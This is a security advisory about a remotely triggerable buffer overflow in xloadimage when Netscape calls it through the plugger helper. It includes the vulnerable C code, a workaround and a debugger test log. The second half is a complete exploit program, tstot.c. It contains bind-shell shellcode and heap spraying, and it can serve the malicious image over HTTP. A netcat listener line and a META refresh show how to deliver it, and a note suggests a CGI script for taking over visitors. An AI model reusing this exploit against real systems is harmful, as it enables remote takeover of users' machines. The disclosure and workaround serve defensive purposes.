|
|
|
|
| |
| The xloadimage application suffers from a buffer overflow vulnerability. While this is normally not a security problem, xloadimage is called by the 'plugger' program from inside Netscape to handle some image types. Hence, a remote site could cause arbitrary code to be executed as the user running Netscape. It is recommended that users of Netscape and plugger update to the fixed xloadimage packages. |
| |
Credit:
The information has been provided by zen-parse.
|
| |
/usr/X11R6/bin/xloadimage is a plugin, used by Netscape 4.77, via /usr/lib/netscape/plugins/plugger.so, to display certain types of images (TIFF and Sun Rasterfile formats, as the setup in /etc/pluggerrc has by default) in the Netscape browser window.
The problem is that xloadimage has an exploitable overflow in the handling of faces format images. The vulnerability allows an attacker to cause Netscape to launch a shell code, due to a coding error:
(BUFSIZ is 8192)
...
char fname[BUFSIZ];
char lname[BUFSIZ];
char buf[BUFSIZ];
...
if (!strncmp(buf, "FirstName:", 10))
strcpy(fname, buf + 11);
else if (!strncmp(buf, "LastName:", 9))
strcpy(lname, buf + 10);
...
fname[strlen(fname) - 1]= ' ';
strcat(fname, lname);
fname[strlen(fname) - 1]= '\0';
...
Solution:
See the Bug IDs http://bugzilla.redhat.com/bugzilla for more info:
46186 - Remotely exploitable overflow via Netscape
Workaround:
Disable xloadimage from being used as a helper application for Netscape by changing the line /etc/pluggerrc that reads:
exits: xloadimage -quiet -windowid $window $file
Into
# exits: xloadimage -quiet -windowid $window $file
Or remove that line.
How to test:
bash-2.04$ make tstot
cc tstot.c -o tstot
bash-2.04$ ./tstot >tstot.tif
bash-2.04$ ls -al tstot.tif
-rw-r--r-- 1 evil evil 75707 Jun 27 16:53 tstot.tif
bash-2.04$ gdb -q xloadimage
(no debugging symbols found)...(gdb) r evil.tif
Starting program: /usr/X11R6/bin/xloadimage evil.tif
(no debugging symbols found)...(no debugging symbols found)...
evil.tif is a 32x32 8-bit grayscale Faces Project image
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0xdeadbeef in ?? ()
(gdb)
Another way of launching the exploit is:
bash-2.04$ ./tstot something|nc -l -p 9876
And do a refresh in your HTML:
<META HTTP-EQUIV="Refresh" Content="1;url=http://youraddress:9876/">
This could also be made into an evil cgi-bin that checks for a (potentially) vulnerable machine before firing it to them, and then connects to the listening port and 0wns them with a local exploit.
Exploit:
//#define TARGET 0x080e1337
//as 1337 as the 1337357 kiddies.
#define TARGET 0xdeadbeef
// lamagra's port binding shell code (from bind.c in the sc.tar.gz)
//
char lamagra_bind_code[] =
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x1d\x29\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
// slight modification so it listens on 7465 instead of 3879
// TAGS is easier to remember ;]
char *
this (int doit)
{
char *p;
int v;
p = (char *) malloc (8200);
memset (p, 0x90, 8200);
if (!doit)
for (v = 0; v < 8100; v += 122)
{
p[v] = 0xeb;
p[v + 1] = 120;
}
if (doit)
memcpy (&p[7000], lamagra_bind_code, strlen (lamagra_bind_code));
p[8199] = 0;
return p;
}
main (int argc)
{
int z0, x = TARGET;
int z1, y = x;
int p;
char *q;
if (argc > 1)
printf ("HTTP/1.0 200\nContent-Type: image/x-tiff\n\n");
printf ("FirstName: %s\n", this (0));
printf ("LastName: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");
printf ("%s\n", &x);
// Begin Padding Heap With 'Garbage' (nop/jmp)
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
// End Padding Heap With 'Garbage' (nop/jmp)
printf ("%s", this (1));
printf ("http://www.mp3.com/cosv");
printf ("\nPicData: 32 32 8\n");
printf ("\n");
for (p = 0; p < 9994; p += 1)
printf ("A");
}
// EOF -- tstot.c --
|
|
|
|
|
